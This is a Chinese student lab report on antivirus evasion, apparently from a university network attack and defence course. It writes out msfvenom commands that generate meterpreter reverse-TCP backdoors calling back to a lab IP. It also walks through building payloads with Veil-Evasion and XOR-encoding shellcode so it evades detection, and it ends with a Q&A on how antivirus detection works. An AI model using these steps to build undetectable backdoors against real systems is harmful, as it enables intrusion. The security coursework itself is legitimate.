20155220 網絡攻防技術 實驗三 免殺原理與實踐
阿新 • • 發佈:2018-04-11
基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件
網絡攻防技術 實驗三 免殺原理與實踐
使用msf生成後門程序的檢測
- 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測
- 然後我們利用
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar
,
生成jar文件,進行檢測。
使用veil-evasion生成反彈鏈接的可執行文件
首先我們先對veil-evasion進行安裝,詳情可參考老師博客
安裝好之後,我們利用
veil
,指令打開veil-evasion
依次用
use evasion
list payloads
,進入到payloads模板界面隨便選擇一個模板,將其復制,然後輸入
use 5
(你所復制的模板)然後輸入
set LHOST kali-ip
,set LPORT 5220
對其進行配置,然後輸入generate
,生成。
利用shellcode編程實現免殺
- 首先我們輸入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c
- 根據老師所給的,將其變成C語言文件,進行編譯
- 進行回連,回連成功
對shellcode進行更改
- 我首先對其進行異或,我做的為異或0x83
回連成功
進行檢測,如圖
加殼
加殼由於一系列原因失敗了,所以很難受。
基礎問題
1.殺軟是如何檢測出惡意代碼的?
基於特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的特征串組成,根據已檢測出或網絡上公布的病毒,對其提取特征碼,記錄成病毒庫,檢測到程序時將程序與特征碼比對即可判斷是否是惡意代碼。
.基於行為的惡意軟件檢測:在程序運行的狀態下(動態)對其行為進行監控,如果有敏感行為會被認為是惡意程序,是一種動態的監測與捕捉。
2.免殺是做什麽?
- 免殺是將二進制碼隱藏,或者變形
3.免殺的基本方法有哪些?
改變特征碼
對exe可執行文件加殼:壓縮殼 加密殼
基於payload重新編譯生成可執行文件
實踐總結與體會
本次實驗過程頗為曲折,首先在下載veil過程中無法安裝,再三嘗試後只得拷了一個虛擬機;
然後對shellcode代碼更改後,回連出現了失敗,在組長的指導下順利解決了該問題。
通過本次實驗,突然發現稍稍修改病毒就可以騙過好多殺毒軟件,讓我對現在電腦的安全性有了重新的審視;
最後我還是趕緊去給電腦殺毒了。
20155220 網絡攻防技術 實驗三 免殺原理與實踐